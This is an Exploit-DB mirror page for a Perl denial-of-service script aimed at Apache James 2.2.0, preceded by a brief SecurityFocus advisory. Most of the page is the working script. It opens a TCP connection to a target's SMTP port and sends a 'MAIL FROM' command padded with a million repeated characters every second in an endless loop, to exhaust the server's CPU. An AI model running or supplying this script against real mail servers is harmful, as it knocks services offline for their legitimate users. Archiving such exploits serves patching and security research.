exploit-db-mirror/exploits/multiple/dos/27915.pl
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

34 lines
No EOL
941 B
Perl
Executable file

source: https://www.securityfocus.com/bid/18138/info
Apache James is prone to a remote denial-of-service vulnerability. This issue is due to the application's failure to efficiently handle malformed SMTP commands.
This issue allows remote attackers to consume excessive CPU resources of affected computers, potentially denying service to legitimate users.
Apache James version 2.2.0 is vulnerable to this issue; other versions may also be affected.
#!/usr/bin/perl -w
use IO::Socket;
print "* DOS buat JAMES ver.2.2.0 by y3dips *\n";
if(@ARGV == 1)
{
my $host = $ARGV[0];
my $i = 1;
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>"25", Reuse=>1)
or die " Cannot Connect to Server !";
while ( $i++ ) {
print $socket "MAIL FROM:" . "fvclz" x 1000000 . "\r\n" and
print " -- sucking CPU resources at $host .....\n";
sleep(1);
}
close $socket;
}
else
{ print " Usage: $0 [target] \r\n\n"; }